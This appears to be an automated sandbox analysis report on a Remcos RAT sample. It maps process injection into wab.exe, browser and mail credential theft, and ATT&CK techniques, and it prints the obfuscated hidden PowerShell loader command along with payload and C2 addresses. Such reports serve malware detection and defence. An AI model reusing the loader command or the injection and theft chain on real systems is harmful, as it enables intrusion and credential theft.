              Source: C:\Users\user\Desktop\Palmebladstag.exeCode function: 0_2_00405E7B FindFirstFileA,FindClose,0_2_00405E7B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_243910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_243910F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_24396580 FindFirstFileExA,9_2_24396580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00418981 memset,GetSystemInfo,10_2_00418981
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
              Source: wab.exe, 00000009.00000002.3393823082.00000000087CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3393823082.000000000879A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\Palmebladstag.exeAPI call chain: ExitProcess graph end nodegraph_0-3384
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_11-34125
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_243960E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_243960E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Users\user\Desktop\Palmebladstag.exeCode function: 0_2_00405EA2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EA2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_24394AB4 mov eax, dword ptr fs:[00000030h]9_2_24394AB4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_2439724E GetProcessHeap,9_2_2439724E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_243960E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_243960E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_24392639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_24392639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_24392B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_24392B1C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4290000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2DFF8A0Jump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne)Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\apzqjktfdlnytnymteytleohyelguybueg"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cjmbkce"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mlstdvoafb"Jump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden ; $tangsnarrerne=get-content 'c:\users\user\appdata\local\temp\humles\kvarterslag\menneskeliggrelsens.lyn';$ebeneous122=$tangsnarrerne.substring(52669,3);.$ebeneous122($tangsnarrerne)
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden ; $tangsnarrerne=get-content 'c:\users\user\appdata\local\temp\humles\kvarterslag\menneskeliggrelsens.lyn';$ebeneous122=$tangsnarrerne.substring(52669,3);.$ebeneous122($tangsnarrerne)Jump to behavior
              Source: wab.exe, 00000009.00000003.3106407665.00000000087F6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3106291272.00000000087F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerneero
              Source: wab.exe, 00000009.00000002.3394082279.00000000087F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager76\J
              Source: wab.exe, 00000009.00000002.3394082279.00000000087F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager%
              Source: wab.exe, 00000009.00000002.3393823082.00000000087CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3394082279.00000000087F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 00000009.00000002.3394082279.00000000087F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*X
              Source: wab.exe, 00000009.00000002.3394082279.00000000087F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*
              Source: wab.exe, 00000009.00000002.3394082279.00000000087F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
              Source: wab.exe, 00000009.00000003.3106291272.00000000087F1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3394065325.00000000087F1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3106694164.00000000087F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerJ
              Source: wab.exe, 00000009.00000003.3106407665.00000000087F6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3106291272.00000000087F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ
              Source: wab.exe, 00000009.00000002.3394082279.00000000087F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles,
              Source: wab.exe, 00000009.00000002.3394082279.00000000087F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles
              Source: wab.exe, 00000009.00000002.3394082279.00000000087F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager76\Q
              Source: wab.exe, 00000009.00000003.3106407665.00000000087F6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3393823082.00000000087CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3393823082.00000000087B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: wab.exe, 00000009.00000003.3106291272.00000000087F1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3394065325.00000000087F1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3106694164.00000000087F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager|
              Source: wab.exe, 00000009.00000002.3394082279.00000000087F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerneer:
              Source: wab.exe, 00000009.00000002.3393823082.00000000087B1000.00000004.00000020.00020000.00000000.sdmp, logs.dat.9.drBinary or memory string: [Program Manager]
              Source: wab.exe, 00000009.00000002.3394082279.00000000087F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager76\o
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_24392933 cpuid 9_2_24392933
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_24392264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_24392264
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,11_2_004082CD
              Source: C:\Users\user\Desktop\Palmebladstag.exeCode function: 0_2_00405B99 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405B99
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000009.00000002.3385414455.0000000002DFE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3393823082.00000000087CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3393823082.00000000087DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3393823082.00000000087B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6820, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword11_2_004033F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword11_2_00402DB3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword11_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6820, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4492, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-GZK076Jump to behavior
              Source: Yara matchFile source: 00000009.00000002.3385414455.0000000002DFE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3393823082.00000000087CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3393823082.00000000087DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3393823082.00000000087B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6820, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts11
              Native API
              Boot or Logon Initialization Scripts1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              2
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts112
              Command and Scripting Interpreter
              Logon Script (Windows)212
              Process Injection
              1
              Software Packing
              2
              Credentials in Registry
              4
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Remote Access Software
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              PowerShell
              Login HookLogin Hook1
              DLL Side-Loading
              1
              Credentials In Files
              29
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Masquerading
              LSA Secrets31
              Security Software Discovery
              SSH2
              Clipboard Data
              112
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
              Virtualization/Sandbox Evasion
              Cached Domain Credentials21
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
              Process Injection
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1439568 Sample: Palmebladstag.exe Startdate: 10/05/2024 Architecture: WINDOWS Score: 100 44 geoplugin.net 2->44 52 Found malware configuration 2->52 54 Antivirus detection for URL or domain 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 9 other signatures 2->58 9 Palmebladstag.exe 3 101 2->9         started        signatures3 process4 file5 34 C:\Users\user\...\Menneskeliggrelsens.Lyn, ASCII 9->34 dropped 36 C:\Users\user\AppData\...\babyloniernes.for, DOS 9->36 dropped 66 Suspicious powershell command line found 9->66 13 powershell.exe 18 9->13         started        signatures6 process7 signatures8 68 Obfuscated command line found 13->68 70 Writes to foreign memory regions 13->70 72 Found suspicious powershell code related to unpacking or dynamic code loading 13->72 16 wab.exe 3 15 13->16         started        21 conhost.exe 13->21         started        23 cmd.exe 1 13->23         started        process9 dnsIp10 38 172.93.222.147, 2404, 49724, 49725 WOWUS United States 16->38 40 209.90.234.58, 49723, 80 SERVERHOSH-AS-APServerhoshInternetServiceNL United States 16->40 42 geoplugin.net 178.237.33.50, 49726, 80 ATOM86-ASATOM86NL Netherlands 16->42 32 C:\ProgramData\remcos\logs.dat, data 16->32 dropped 46 Detected Remcos RAT 16->46 48 Maps a DLL or memory area into another process 16->48 50 Installs a global keyboard hook 16->50 25 wab.exe 1 16->25         started        28 wab.exe 1 16->28         started        30 wab.exe 14 16->30         started        file11 signatures12 process13 signatures14 60 Tries to steal Instant Messenger accounts or passwords 25->60 62 Tries to harvest and steal browser information (history, passwords, etc) 25->62 64 Tries to steal Mail credentials (via file / registry access) 28->64

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Palmebladstag.exe50%ReversingLabsWin32.Backdoor.Remcos
              Palmebladstag.exe25%VirustotalBrowse
              Palmebladstag.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Arlettes\babyloniernes.for0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Arlettes\babyloniernes.for0%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLink
              geoplugin.net3%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://www.imvu.comr0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              http://crl.microsoft0%URL Reputationsafe
              https://login.li0%URL Reputationsafe
              https://login.li0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gp100%URL Reputationphishing
              http://crl.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              http://www.ebuddy.com0%URL Reputationsafe
              http://209.90.234.58/fGuGZ105.bin0%Avira URL Cloudsafe
              http://www.imvu.compData0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              http://geoplugin.net/json.gplRx0%Avira URL Cloudsafe
              172.93.222.1470%Avira URL Cloudsafe
              http://geoplugin.net/json.gpal0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp)m0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpmm0%Avira URL Cloudsafe
              http://209.90.234.58/fGuGZ105.bin1%VirustotalBrowse
              http://209.90.234.58/fGuGZ105.binP0%Avira URL Cloudsafe
              172.93.222.1471%VirustotalBrowse
              http://geoplugin.net/json.gpal0%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              178.237.33.50
              truefalseunknown
              NameMaliciousAntivirus DetectionReputation
              http://209.90.234.58/fGuGZ105.binfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://geoplugin.net/json.gptrue
              • URL Reputation: phishing
              unknown
              172.93.222.147true
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.3051799835.0000000005855000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.imvu.comrwab.exe, 00000009.00000002.3405678393.0000000024360000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.3085535723.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.3049075645.0000000004946000.00000004.00000800.00020000.00000000.sdmptrue
                • URL Reputation: malware
                unknown
                http://crl.microsoftpowershell.exe, 00000002.00000002.3053027455.0000000006EF9000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.3049075645.0000000004946000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.imvu.compDatawab.exe, 0000000C.00000002.3090987427.0000000002FFD000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://login.liwab.exe, 0000000A.00000002.3102208643.0000000002A3C000.00000004.00000010.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Licensepowershell.exe, 00000002.00000002.3051799835.0000000005855000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.imvu.comwab.exe, wab.exe, 0000000C.00000002.3090987427.0000000002FFD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3085535723.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    high
                    https://contoso.com/Iconpowershell.exe, 00000002.00000002.3051799835.0000000005855000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.nirsoft.netwab.exe, 0000000A.00000002.3102231409.0000000002A74000.00000004.00000010.00020000.00000000.sdmpfalse
                      high
                      http://nsis.sf.net/NSIS_ErrorErrorPalmebladstag.exefalse
                        high
                        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.3049075645.0000000004946000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 00000009.00000002.3405678393.0000000024360000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.3085535723.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.comwab.exe, wab.exe, 0000000C.00000002.3085535723.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            high
                            http://nsis.sf.net/NSIS_ErrorPalmebladstag.exefalse
                              high
                              http://crl.micropowershell.exe, 00000002.00000002.3055536411.0000000007F80000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
